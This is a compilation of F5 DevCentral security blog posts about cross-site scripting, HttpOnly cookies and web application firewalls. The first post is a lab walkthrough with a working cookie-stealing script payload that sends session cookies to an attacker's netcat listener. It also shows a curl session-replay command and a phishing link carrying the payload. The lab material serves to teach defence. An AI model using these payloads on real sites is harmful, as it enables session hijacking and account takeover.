xss
8 TopicsCross Site Scripting (XSS) Exploit Paths
Introduction Web application threats continue to cause serious security issues for large corporations and small businesses alike. In 2016, even the smallest, local family businesses have a Web presence, and it is important to understand the potential attack surface in any web-facing asset, in order to properly understand vulnerabilities, exploitability, and thus risk. The Open Web Application Security Project (OWASP) is a non-profit organization dedicated to ensuring the safety and security of web application software, and periodically releases a Top 10 list of common categories of web application security flaws. The current list is available at https://www.owasp.org/index.php/Top_10_2013-Top_10 (an updated list for 2016/2017 is currently in data call announcement), and is used by application developers, security professionals, software vendors and IT managers as a reference point for understanding the nature of web application security vulnerabilities. This article presents a detailed analysis of the OWASP security flaw A3: Cross-Site Scripting (XSS), including descriptions of the three broad types of XSS and possibilities for exploitation. Cross Site Scripting (XSS) Cross-Site Scripting (XSS) attacks are a type of web application injection attack in which malicious script is delivered to a client browser using the vulnerable web app as an intermediary. The general effect is that the client browser is tricked into performing actions not intended by the web application. The classic example of an XSS attack is to force the victim browser to throw an ‘XSS!’ or ‘Alert!’ popup, but actual exploitation can result in the theft of cookies or confidential data, download of malware, etc. Persistent XSS Persistent (or Stored) XSS refers to a condition where the malicious script can be stored persistently on the vulnerable system, such as in the form of a message board post. Any victim browsing the page containing the XSS script is an exploit target. This is a very serious vulnerability as a public stored XSS vulnerability could result in many thousands of cookies stolen, drive-by malware downloads, etc. As a proof-of-concept for cookie theft on a simple message board application, consider the following: Here is our freshly-installed message board application. Users can post comments, admins can access the admin panel. Let’s use the typical POC exercise to validate that the message board is vulnerable to XSS: Sure enough, it is: Just throwing a dialog box is kinda boring, so let’s do something more interesting. I’m going to inject a persistent XSS script that will steal the cookies of anyone browsing the vulnerable page: Now I start a listener on my attacking box, this can be as simple as netcat, but can be any webserver of your choosing (python simpleHTTPserver is another nice option). dsyme@kylie:~$ sudo nc -nvlp 81 And wait for someone – hopefully the site admin – to browse the page. The admin has logged in and browsed the page. Now, my listener catches the HTTP callout from my malicious script: And I have my stolen cookie PHPSESSID=lrft6d834uqtflqtqh5l56a5m4 . Now I can use an intercepting proxy or cookie manager to impersonate admin. Using Burp: Or, using Cookie Manager for Firefox: Now I’m logged into the admin page: Access to a web application CMS is pretty close to pwn. From here I can persist my access by creating additional admin accounts (noisy), or upload a shell (web/php reverse) to get shell access to the victim server. Bear in mind that using such techniques we could easily host malware on our webserver, and every victim visiting the page with stored XSS would get a drive-by download. Non-Persistent XSS Non-persistent (or reflected) XSS refers to a slightly different condition in which the malicious content (script) is immediately returned by a web application, be it through an error message, search result, or some other means that echoes some part of the request back to the client. Due to their nonpersistent nature, the malicious code is not stored on the vulnerable webserver, and hence it is generally necessary to trick a victim into opening a malicious link in order to exploit a reflected XSS vulnerability. We’ll use our good friend DVWA (Damn Vulnerable Web App) for this example. First, we’ll validate that it is indeed vulnerable to a reflected XSS attack: It is. Note that this can be POC’d by using the web form, or directly inserting code into the ‘name’ parameter in the URL. Let’s make sure we can capture a cookie using the similar manner as before. Start a netcat listener on 192.168.178.136:81 (and yes, we could use a full-featured webserver for this to harvest many cookies), and inject the following into the ‘name’ parameter: <SCRIPT>document.location='http://192.168.178.136:81/?'+document.cookie</SCRIPT> We have a cookie, PHPSESSID=ikm95nv7u7dlihhlkjirehbiu2 . Let’s see if we can use it to login from the command line without using a browser: $ curl -b "security=low;PHPSESSID=ikm95nv7u7dlihhlkjirehbiu2" --location "http://192.168.178.140/dvwa/" > login.html $ dsyme@kylie:~$ egrep Username login.html <div align="left"><em>Username:</em> admin<br /><em>Security Level:</em> low<br /><em>PHPIDS:</em> disabled</div> Indeed we can. Now, of course, we just stole our own cookie here. In a real attack we’d be wanting to steal the cookie of the actual site admin, and to do that, we’d need to trick him or her into clicking the following link: http://192.168.178.140/dvwa/vulnerabilities/xss_r/?name=victim<SCRIPT>document.location='http://192.168.178.136:81/?'+document.cookie</SCRIPT> Or, easily enough to put into an HTML message like this. And now we need to get our victim to click the link. A spear phishing attack might be a good way. And again, we start our listener and wait. Of course, instead of stealing admin’s cookies, we could host malware on a webserver somewhere, and distribute the malicious URL by phishing campaign, host on a compromised website, distribute through Adware (there are many possibilities), and wait for drive-by downloads. The malicious links are often obfuscated using a URL-shortening service. DOM-Based XSS DOM-based XSS is an XSS attack in which the malicious payload is executed as a result of modification of the Document Object Model (DOM) environment of the victim browser. A key differentiator between DOM-based and traditional XSS attacks is that in DOM-based attacks the malicious code is not sent in the HTTP response from server to client. In some cases, suspicious activity may be detected in HTTP requests, but in many cases no malicious content is ever sent to or from the webserver. Usually, a DOM-based XSS vulnerability is introduced by poor input validation on a client-side script. A very nice demo of DOM-based XSS is presented at https://xss-doc.appspot.com/demo/3. Here, the URL Fragment (the portion of the URL after #, which is never sent to the server) serve as input to a client-side script – in this instance, telling the browser which tab to display: Unfortunately, the URL fragment data is passed to the client-side script in an unsafe fashion. Viewing the source of the above webpage, line 8 shows the following function definition: And line 33: In this case we can pass a string to the URL fragment that we know will cause the function to error, e.g. “foo”, and set an error condition. Reproducing the example from the above URL with full credit to the author, it is possible to inject code into the error condition causing an alert dialog: Which could be modified in a similar fashion to steal cookies etc. And of course we could deface the site by injecting an image of our choosing from an external source: There are other possible vectors for DOM-based XSS attacks, such as: Unsanitized URL or POST body parameters that are passed to the server but do not modify the HTTP response, but are stored in the DOM to be used as input to the client-side script. An example is given at https://www.owasp.org/index.php/DOM_Based_XSS Interception of the HTTP response to include additional malicious scripts (or modify existing scripts) for the client browser to execute. This could be done with a Man-in-the-Browser attack (malicious browser extensions), malware, or response-side interception using a web proxy. Like reflected XSS, exploitation is often accomplished by fooling a user into clicking a malicious link. DOM-based XSS is typically a client-side attack. The only circumstances under which server-side web-based defences (such as mod_security, IDS/IPS or WAF) are able to prevent DOM-based XSS is if the malicious script is sent from client to server, which is not usually the case for DOM-based XSS. As many more web applications utilize client-side components (such as sending periodic AJAX calls for updates), DOM-based XSS vulnerabilities are on the increase – an estimated 10% of the Alexa top 10k domains contained DOM-based XSS vulnerabilities according to Ben Stock, Sebastian Lekies and Martin Johns (https://www.blackhat.com/docs/asia-15/materials/asia-15-Johns-Client-Side-Protection-Against-DOM-Based-XSS-Done-Right-(tm).pdf). Preventing XSS XSS vulnerabilities exist due to a lack of input validation, whether on the client or server side. Secure coding practices, regular code review, and white-box penetration testing are the best ways to prevent XSS in a web application, by tackling the problem at source. OWASP has a detailed list of rules for XSS prevention documented at https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet. There are many other resources online on the topic. However, for many (most?) businesses, it may not be possible to conduct code reviews or commit development effort to fixing vulnerabilities identified in penetration tests. In most cases, XSS can be easily prevented by the deployment of Web Application Firewalls. Typical mechanisms for XSS-prevention with a WAF are: Alerting on known XSS attack signatures Prevention of input of <script> tags to the application unless specifically allowed (rare) Prevention of input of < ,> characters in web forms Multiple URL decoding to prevent bypass attempts using encoding Enforcement of value types in HTTP parameters Blocking non-alphanumeric characters where they are not permitted Typical IPS appliances lack the HTTP intelligence to be able to provide the same level of protection as a WAF. For example, while an IPS may block the <script> tag (if it is correctly configured to intercept SSL), it may not be able to handle the URL decoding required to catch obfuscated attacks. F5 Silverline is a cloud-based WAF solution and provides native and quick protection against XSS attacks. This can be an excellent solution for deployed production applications that include XSS vulnerabilities, because modifying the application code to remove the vulnerability can be time-consuming and resource-intensive. Full details of blocked attacks (true positives) can be viewed in the Silverline portal, enabling application and network administrators to extract key data in order to profile attackers: Similarly, time-based histograms can be displayed providing details of blocked XSS campaigns over time. Here, we can see that a serious XSS attack was prevented by Silverline WAF on September 1 st : F5 Application Security Manager (ASM) can provide a similar level of protection in an on-premise capacity. It is of course highly recommended that any preventive controls be tested – which typically means running an automated vulnerability scan (good) or manual penetration test (better) against the application once the control is in place. As noted in the previous section, do not expect web-based defences such as a WAF to protect against DOM-based XSS as most attack vectors do no actually send any malicious traffic to the server.13KViews1like0CommentsStop Those XSS Cookie Bandits iRule Style
In a recent post, CodingHorror blogged about a story of one of his friends attempts at writing his own HTML sanitizer for his website. I won't bother repeating the details but it all boils down to the fact that his friend noticed users were logged into his website as him and hacking away with admin access. How did this happen? It turned out to be a Cross Site Scripting attack (XSS) that found it's way around his HTML sanitizing routines. A user posted some content that included mangled JavaScript that made an external reference including all history and cookies of the current users session to an alternate machine. CodingHorror recommended adding the HttpOnly attribute to Set-Cookie response headers to help protect these cookies from being able to make their way out to remote machines. Per his blog post: HttpOnly restricts all access to document.cookie in IE7, Firefox 3, and Opera 9.5 (unsure about Safari) HttpOnly removes cookie information from the response headers in XMLHttpObject.getAllResponseHeaders() in IE7. It should do the same thing in Firefox, but it doesn't, because there's a bug. XMLHttpObjects may only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies. Whenever I hear about modifications made to backend servers, alarms start going off in my head and I get to thinking about how this can be accomplished on the network transparently. Well, if you happen to have a BIG-IP, then it's quite easy. A simple iRule can be constructed that will check all the response cookies and if they do not already have the HttpOnly attribute, then add it. I went one step further and added a check for the "Secure" attribute and added that one in as well for good measure. when HTTP_RESPONSE { foreach cookie [HTTP::cookie names] { set value [HTTP::cookie value $cookie]; if { "" != $value } { set testvalue [string tolower $value] set valuelen [string length $value] #log local0. "Cookie found: $cookie = $value"; switch -glob $testvalue { "*;secure*" - "*; secure*" { } default { set value "$value; Secure"; } } switch -glob $testvalue { "*;httponly*" - "*; httponly*" { } default { set value "$value; HttpOnly"; } } if { [string length $value] > $valuelen} { #log local0. "Replacing cookie $cookie with $value" HTTP::cookie value $cookie "${value}" } } } } If you are only concerned with the Secure attribute, then you can always use the "HTTP::cookie secure" command but as far as I can tell it won't include the HttpOnly attribute. So, if you determine that HttpOnly cookies are the way you want to go, you could manually configure these on all of your applications on your backend servers. Or... you could configure it in one place on the network. I think I prefer the second option. -Joe403Views0likes0CommentsLightboard Lessons: OWASP Top 10 - Cross Site Scripting
The OWASP Top 10 is a list of the most common security risks on the Internet today. Cross Site Scripting (XSS)comes in at the #7spot in the latest edition of the OWASP Top 10. In this video, John discusses how Cross Site Scripting worksand outlines some mitigation steps to make sure your web application stays secure against this threat. Related Resources: Securing against the OWASP Top 10: Cross-Site Scripting694Views0likes0CommentsThe Lock May be Broken
A couple of weeks ago, a new security advisory was published: CVE-2012-0053 - “Apache HttpOnly Cookie Disclosure”. While the severity of this vulnerability is just “medium”, there are some things that we can learn from it. As far as I see it, this vulnerability actually uses a more sophisticated approach in order to steal sensitive information. It suggests an exploit proof of concept that combines two attack methods: 1. A well-known application security vulnerability named “Cross-Site Scripting (XSS)”. 2. A newly introduced vulnerability in Apache, where sending a cookie HTTP-Header that is too long, the HttpOnly cookie value, is returned by the web server in a “400 Bad Request” response page. From the OWASP page on HttpOnly - Mitigating the Most Common XSS attack using HttpOnly “The majority of XSS attacks target theft of session cookies. A server could help mitigate this issue by setting the HTTPOnly flag on a cookie it creates, indicating the cookie should not be accessible on the client. If a browser that supports HttpOnly detects a cookie containing the HttpOnly flag, and client side script code attempts to read the cookie, the browser returns an empty string as the result. This causes the attack to fail by preventing the malicious (usually XSS) code from sending the data to an attacker's website.” So the HttpOnly cookie that is not supposed to be accessed by Java-Script on client browser can be accessed when exploiting this vulnerability. In other words, the lock may be broken, and the mechanism that is supposed to prevent an attack, in some circumstances, can be bypassed. This leads me to say that while security countermeasures are becoming more and more sophisticated over the years, security vulnerabilities and their exploits are becoming more and more elusive. Web Application Firewalls were designed from the beginning to solve such zero-day vulnerabilities presenting multi layered protection for the web application by combining signature based, HTTP protocol constraints and web application behavioral anomalies protection. From BIG-IP Application Security Manager perspective, this vulnerability can be easily mitigated by performing the following: i. Using Cross-Site Scripting signatures in order to mitigate Cross-Site Scripting vulnerabilities. ii. Applying a security policy that limits the header’s length. iii. Creating a custom error page when this violation occurs.289Views0likes0CommentsF5 Friday: Eliminating the Blind Spot in Your Data Center Security Strategy
Pop Quiz: In recent weeks, which of the following attack vectors have been successfully used to breach major corporation security? (choose all that apply) Phishing Parameter tampering SQL Injection DDoS SlowLoris Data leakage If you selected them all, give yourself a cookie because you’re absolutely right. All six of these attacks have successfully been used recently, resulting in breaches across the globe: International Monetary Fund US Government – Senate CIA Citibank Malaysian Government Sony Brazilian governmentand Petrobraslatest LulzSecvictims That’s no surprise; attacks are ongoing, constantly. They are relentless. Many of them are mass attacks with no specific target in mind, others are more subtle, planned and designed to do serious damage to the victim. Regardless, these breaches all have one thing in common: the breach was preventable. At issue is the reality that attackers today have moved up the stack and are attacking in the data center’s security blind spot: the application layer. Gone are the days of blasting the walls of the data center with packets to take out a site. Data center interconnects have expanded to the point that it’s nearly impossible to disrupt network infrastructure and cause an outage without a highly concerted and distributed effort. It does happen, but it’s more frequently the case that attackers are moving to highly targeted, layer 7 attacks that are far more successful using far fewer resources with a much smaller chance of being discovered. The security-oriented infrastructure traditionally relied upon to alert on attacks is blind; unable to detect layer 7 attacks because they don’t appear to be attacks. They look just like “normal” users. The most recent attack, against www.cia.gov, does not appear to be particularly sophisticated. LulzSec described that attack as a simple packet flood, which overwhelms a server with volume. Analysts at F5, which focuses on application security and availability, speculated that it actually was a Slowloris attack, a low-bandwidth technique that ties up server connections by sending partial requests that are never completed. Such an attack can come in under the radar because of the low volume of traffic it generates and because it targets the application layer, Layer 7 in the OSI model, rather than the network layer, Layer 3. [emphasis added] -- Ongoing storm of cyberattacks is preventable, experts say It isn’t the case that organizations don’t have a sound security strategy and matching implementation, it’s that the strategy has a blind spot at the application layer. In fact, it’s been the evolution of network and transport layer security success that’s almost certainly driven attackers to climb higher up the stack in search of new and unanticipated (and often unprotected) avenues of opportunity. ELIMINATING the BLIND SPOT Too often organizations – and specifically developers – hear the words “layer 7” anything and immediately take umbrage at the implication they are failing to address application security. In many situations it is the application that is vulnerable, but far more often it’s not the application – it’s the application platform or protocols that is the source of contention, neither of which a developer has any real control over. Attacks designed to specifically leech off resources – SlowLoris, DDoS, HTTP floods – simply cannot be noticed or prevented by the application itself. Neither are these attacks noticed or prevented by most security infrastructure components because they do not appear to be attacks. In cases where protocol (HTTP) exploitation is leveraged, it is not possible to detect such an attack unless the right information is available in the right place at the right time. The right place is a strategic point of control. The right time is when the attack begins. The right information is a combination of variables, the context carried with every request that imparts information about the client, network, and server-side status. If a component can see that a particular user is sending data at a rate much slower than their network connection should allow, that tells the component it’s probably an application layer attack that then triggers organizational policies regarding how to deal with such an attack: reject the connection, shield the application, notify an administrator. Only a component that is positioned properly in the data center, i.e. in a strategic point of control, can properly see all the variables and make such a determination. Only a component that is designed specifically to intercept, inspect and act on data across the entire network and application stack can detect and prevent such attacks from being successfully carried out. BIG-IP is uniquely positioned – topologically and technologically – to address exactly these kinds of multi-layer attacks. Whether the strategy to redress such attacks is “Inspect and Reject” or “Buffer and Wait”, the implementation using BIG-IP simply makes sense. Because of its position in the network – in front of applications, between clients and servers – BIG-IP has the visibility into both internal and external variables necessary. With its ability to intercept and inspect and then act upon the variables extracted, BIG-IP is perfectly suited to detecting and preventing attacks that normally wind up in most infrastructure’s blind spot. This trend is likely to continue, and it’s also likely that additional “blind spots” will appear as consumerization via tablets and mobile devices continues to drive new platforms and protocols into the data center. Preventing attacks from breaching security and claiming victory – whether the intent is to embarrass or to profit – is the goal of a comprehensive organizational security strategy. That requires a comprehensive, i.e. multi-layer, security architecture and implementation. One without any blind spots in which an attacker can sneak up on you and penetrate your defenses. It’s time to evaluate your security strategy and systems with an eye toward whether such blind spots exist in your data center. And if they do, it’s well past time to do something about it. More Info on Attack Prevention on DevCentral DevCentral Security Forums DDoS Attack Protection in BIG-IP Local Traffic Manager DDoS Attack Protection in BIG-IP Application Security Manager198Views0likes0CommentsF5 Friday: Expected Behavior is not Necessarily Acceptable Behavior
Sometimes vulnerabilities are simply the result of a protocol design decision, but that doesn’t make it any less a vulnerability An article discussing a new attack on social networking applications that effectively provides an opening through which personal data can be leaked was passed around the Internets recently. If you haven’t read “Abusing HTTP Status Codes to Expose Private Information” yet please do, it’s a good read and exposes, if you’ll pardon the pun, yet another “vulnerability by design” flaw that exists in many of the protocols that make the web go today. We, as an industry, spend a lot of time picking on developers for not writing secure code, for introducing vulnerabilities and subsequently ignoring them, and for basically making the web a very scary place. We rarely, however, talk about the insecurities and flaws inherent in core protocols, however, that contribute to the overall scariness of the Internets. Consider, for example, the misuse and abuse of HTTP as a means to carry out a DDoS attack. Such attacks are not viable due to some developer with a lax attitude toward security, it’s simply the result of the way in which the protocol works. Someone discovered a way to put it to work to carry out their evil plans. The same can be said of the aforementioned “vulnerability.” This isn’t the result of developers not caring about security, it’s merely a side-effect of the way in which HTTP is supposed to work. Site and application developers use HTTP status codes and the like to respond to requests in addition to the content returned. Some of those HTTP status codes aren’t even under the control of the site or application developer – 5xx errors are returned by the web or application server software automatically based on internal conditions. That someone has found a way to leverage these basic behaviors in a way that might allow personal information to be exposed should be no surprise. The more complex web applications – and the interactions that make the “web” an actual “web” of interconnected sites and data stores – become, the more innovative use of admittedly very basic application protocols must be made. That innovation can almost always be turned around and used for more malevolent purposes. What was, troubling, however, was Google’s response to this “vulnerability” in Gmail as described by the author. The author states he “reported it to Google and they described it as "expected behaviour" and ignored it.” Now Google is right – it is expected behavior but that doesn’t necessarily mean it’s acceptable behavior. PROTECTING YOURSELF from BAD EXPECTED BEHAVIOR Enabling protection against this potential exposure of personal information depends on whether you are a user or someone charged with protecting user’s information. If you didn’t read through all the comments on the article then you missed a great suggestion for users interested in protecting themselves against what is similar to a cross-site request forgery (XSRF) attack. I’ll reproduce it here, in total, to make sure nothing is lost: Justin Samuel I'm the RequestPolicy developer. Thanks for the mention. I should point out that if you're using NoScript then you're already safe as long as you haven't allowed JavaScript on this or the other sites. Of course, people do allow JavaScript in some cases but still want control over cross-site requests. In those cases, NoScript + RequestPolicy is a great combo (it's what I use) if the usability impact of having two website-breaking, whitelist-based extensions installed is worth the security and privacy gains. RequestPolicy does have some good usability improvements planned, but if you can only stand to have one of these extensions installed, then I recommend NoScript over RequestPolicy in most situations. Written, Tuesday January the 25th, 2011 So as a user, NoScript or NoScript and RequestPolicy will help keep you safe from the potential misuse of this “expected behavior” by giving you the means by which you can control cross-site requests. As someone responsible for protecting your user/customer/partner/employee information, however, you can’t necessarily force the use of NoScript or RequestPolicy or any other client-side solution. First, it doesn’t protect the data from leaving the building in the first place and second, even if it did and you could force the installation/deployment of such solutions you can’t necessarily control user behavior that may lead to turning it off or otherwise manipulating the environment. The reality is that for organizations trying to protect both themselves and their customers, they have only one thing they can control – their own environment. That means the data center. PROTECTING YOUR CLIENTS FROM BAD EXPECTED BEHAVIOR To prevent data leakage of any kind – whether through behavioral or vulnerability exploitation – you need a holistic security strategy in place. The funny thing about protocol behavior exploitation, however, is that application protocol behavior is governed by the stack and the platform, not necessarily the application itself. Now in this case it’s true that the behavior is eerily similar to a cross-site request forgery (XSRF) attack. Which means developers could and probably should be able to address by enforcing policies that restrict access to specific requests based on referrer or other identifying – contextual – information. The problem is that this means modifying applications for a potential vulnerability that may or may not be exploited. It’s unlikely to have the priority necessary to garner time and effort on the application development team’s already lengthy to-do list. Which is where a web application firewall (WAF) like BIG-IP ASM (Application Security Manager) comes into play. BIG-IP ASM can protect applications and sensitive data from attacks like XSRF right now. It doesn’t take nearly the cycles to implement an XSRF (or other web application layer security policy) using ASM as it will to address in the application itself (if that’s even possible – sometimes it’s not). Whether ASM or any WAF ends up permanently protecting data against exploitation or not is entirely up to the organization. In some cases it may be the most financially and architecturally efficient solution. In other cases it may not. In the former, hey great. In the latter, hey great – you’ve got a stop gap measure to protect data and customers and the organization until such time as a solution can be implemented, tested, and ultimately deployed. Either way, BIG-IP ASM enables organizations to quickly address expected (but still unacceptable) behavior. That means risk is nearly immediately mitigated whether or not the long term solution remains the WAF or falls to developers. Customers don’t care about the political battles or religious wars that occur regarding the role of web application firewalls in the larger data center security strategy and they really don’t want to hear about “expected behavior” as the cause of a data leak. They care that they are protected when using applications against inadvertent theft of their private, personal data. It’s the job of IT to do just that, one way or another. Facebook app pages serve up Javascript and Acai Berry spam The “True Security Company” Red Herring F5 Friday: Two Heads are Better Than One Challenging the Firewall Data Center Dogma F5 Friday: Multi-Layer Security for Multi-Layer Attacks F5 Friday: You’ll Catch More Bees with Honey(pots) Defeating Attacks Easier Than Detecting Them 2011 Hactivism Report Security is Our Job F5 Networks Hacktivism Focus Group183Views0likes0Comments4 Reasons We Must Redefine Web Application Security
Mike Fratto loves to tweak my nose about web application security. He’s been doing it for years, so it’s (d)evolved to a pretty standard set of arguments. But after he tweaked the debate again in a tweet, I got to thinking that part of the problem is the definition of web application security itself. Web application security is almost always about the application (I know, duh! but bear with me) and therefore about the developer and secure coding. Most of the programmatic errors that lead to vulnerabilities and subsequently exploitation can be traced to a lack of secure coding practices, particularly around the validation of user input (which should never, ever be trusted). Whether it’s XSS (Cross Site Scripting) or SQL Injection, the root of the problem is that malicious data or code is submitted to an application and not properly ferreted out by sanitization routines written by developers, for whatever reason. But there are a number of “web application” attacks that have nothing to do with developers and code, and are, in fact, more focused on the exploitation of protocols. TCP and HTTP can be easily manipulated in such a way as to result in a successful attack on an application without breaking any RFC or W3C standard that specifies the proper behavior of these protocols. Worse, the application developer really can’t do anything about these types of attacks because they aren’t aware they are occurring. It is, in fact, the four layers of the TCP/IP stack - the foundation for web applications – that are the reason we need to redefine web application security and expand it to include the network where it makes sense. Being a “web” application necessarily implies network interaction, which implies reliance on the network stack, which implies potential exploitation of the protocols upon which applications and their developers rely but have little or no control over. Web applications ride atop the OSI stack; above and beyond the network and application model on which all web applications are deployed. But those web applications have very little control or visibility into that stack and network-focused security (firewalls, IDS/IPS) have very little awareness of the application. Let’s take a Layer 7 DoS attack as an example. L7 DoS works by exploiting the nature of HTTP 1.1 and its ability to essentially pipeline multiple HTTP requests over the same TCP connection. Ostensibly this behavior reduces the overhead on the server associated with opening and closing TCP connections and thus improves the overall capacity and performance of web and application servers. So far, all good. But this behavior can be used against an application. By requesting a legitimate web page using HTTP 1.1, TCP connections on the server are held open waiting for additional requests to be submitted. And they’ll stay open until the client sends the appropriate HTTP Connection: close header with a request or the TCP session itself times out based on the configuration of the web or application server. Now, imagine a single source opens a lot – say thousands – of pages. They are all legitimate requests; there’s no malicious data involved or incorrect usage of the underlying protocols. From the application’s perspective this is not an attack. And yet it is an attack. It’s a basic resource consumption attack designed to chew up all available TCP connections on the server such that legitimate users cannot be served. The distinction between legitimate users and legitimate requests is paramount to understanding why it is that web application security isn’t always just about the application; sometimes it’s about protocols and behavior external to the application that cannot be controlled let alone detected by the application or its developers. The developer, in order to detect such a misuse of the HTTP protocol, would need to keep what we in the network world call a “session table”. Now web and application servers keep this information, they have to, but they don’t make it accessible to the developer. Basically, the developer’s viewpoint is from inside a single session, dealing with a single request, dealing with a single user. The developer, and the application, have a very limited view of the environment in which the application operates. A web application firewall, however, has access to its session table necessarily. It operates with a view point external to the application, with the ability to understand the “big picture”. It can detect when a single user is opening three or four or thousands of connections and not doing anything with them. It understands that the user is not legitimate because the user’s behavior is out of line with how a normal user interacts with an application. A web application firewall has the context in which to evaluate the behavior and requests and realize that a single user opening multiple connections is not legitimate after all. Not all web application security is about the application. Sometimes it’s about the protocols and languages and platforms supporting the delivery of that application. And when the application lacks visibility into those supporting infrastructure environments, it’s pretty damn difficult for the application developer to use secure coding to protect against exploitation of those facets of the application. We really have to stop debating where web application security belongs and go back to the beginning and redefine what it means in a web driven distributed world if we’re going to effectively tackle the problem any time this century.214Views0likes1CommentWhy it's so hard to secure JavaScript
The discussion yesterday on JavaScript and security got me thinking about why it is that there are no good options other than script management add-ons like NoScript for securing JavaScript. In a compiled language there may be multiple ways to write a loop, but the underlying object code generated is the same. A loop is a loop, regardless of how it's represented in the language. Security products that insert shims into the stack, run as a proxy on the server, or reside in the network can look for anomalies in that object code. This is the basis for many types of network security - IDS, IPS, AVS, intelligent firewalls. They look for anomalies in signatures and if they find one they consider it a threat. While the execution of a loop in an interpreted language is also the same regardless of how it's represented, it looks different to security devices because it's often text-based as is the case with JavaScript and XML. There are only two good options for externally applying security to languages that are interpreted on the client: pattern matching/regex and parsing. Pattern matching and regular expressions provide minimal value for securing client-side interpreted languages, at best, because of the incredibly high number of possible combinations of putting together code. Where's F5? VMWorld Sept 15-18 in Las Vegas Storage Decisions Sept 23-24 in New York Networld IT Roadmap Sept 23 in Dallas Oracle Open World Sept 21-25 in San Francisco Storage Networking World Oct 13-16 in Dallas Storage Expo 2008 UK Oct 15-16 in London Storage Networking World Oct 27-29 in Frankfurt As we learned from preventing SQL injection and XSS, attackers are easily able to avoid detection by these systems by simply adding white space, removing white space, using encoding tricks, and just generally finding a new permutation of their code. Parsing is, of course, the best answer. As 7rans noted yesterday regarding the Billion More Laughs JavaScript hack, if you control the stack, you control the execution of the code. Similarly, if you parse the data you can get it into a format more akin to that of a compiled language and then you can secure it. That's the reasoning behind XML threat defense, or XML firewalls. In fact, all SOA and XML security devices necessarily parse the XML they are protecting - because that's the only way to know whether or not some typical XML attacks, like the Billion Laughs attack, are present. But this implementation comes at a price: performance. Parsing XML is compute intensive, and it necessarily adds latency. Every device you add into the delivery path that must parse the XML to route it, secure it, or transform it adds latency and increases response time, which decreases overall application performance. This is one of the primary reasons most XML-focused solutions prefer to use a streaming parser. Streaming parser performance is much better than a full DOM parser, and still provides the opportunity to validate the XML and find malicious code. It isn't a panacea, however, as there are still some situations where streaming can't be used - primarily when transformation is involved. We know this already, and also know that JavaScript and client-side interpreted languages in general are far more prolific than XML. Parsing JavaScript externally to determine whether it contains malicious code would certainly make it more secure, but it would also likely severely impact application performance - and not in a good way. We also know that streaming JavaScript isn't a solution because unlike an XML document, JavaScript is not confined. JavaScript is delimited, certainly, but it isn't confined to just being in the HEAD of an HTML document. It can be anywhere in the document, and often is. Worse, JavaScript can self-modify at run-time - and often does. That means that the security threat may not be in the syntax or the code when it's delivered to the client, but it might appear once the script is executed. Not only would an intermediate security device need to parse the JavaScript, it would need to execute it in order to properly secure it. While almost all web application security solutions - ours included - are capable of finding specific attacks like XSS and SQL injection that are hidden within JavaScript, none are able to detect and prevent JavaScript code-based exploits unless they can be identified by a specific signature or pattern. And as we've just established, that's no guarantee the exploits won't morph and change as soon as they can be prevented. That's why browser add-ons like NoScript are so popular. Because JavaScript security today is binary: allow or deny. Period. There's no real in between. There is no JavaScript proxy that parses and rejects malicious script, no solution that proactively scans JavaScript for code-based exploits, no external answer to the problem. That means we have to rely on the browser developers to not only write a good browser with all the bells and whistles we like, but for security, as well. I am not aware of any security solution that currently parses out JavaScript before it's delivered to the client. If there are any out there, I'd love to hear about them.271Views0likes1Comment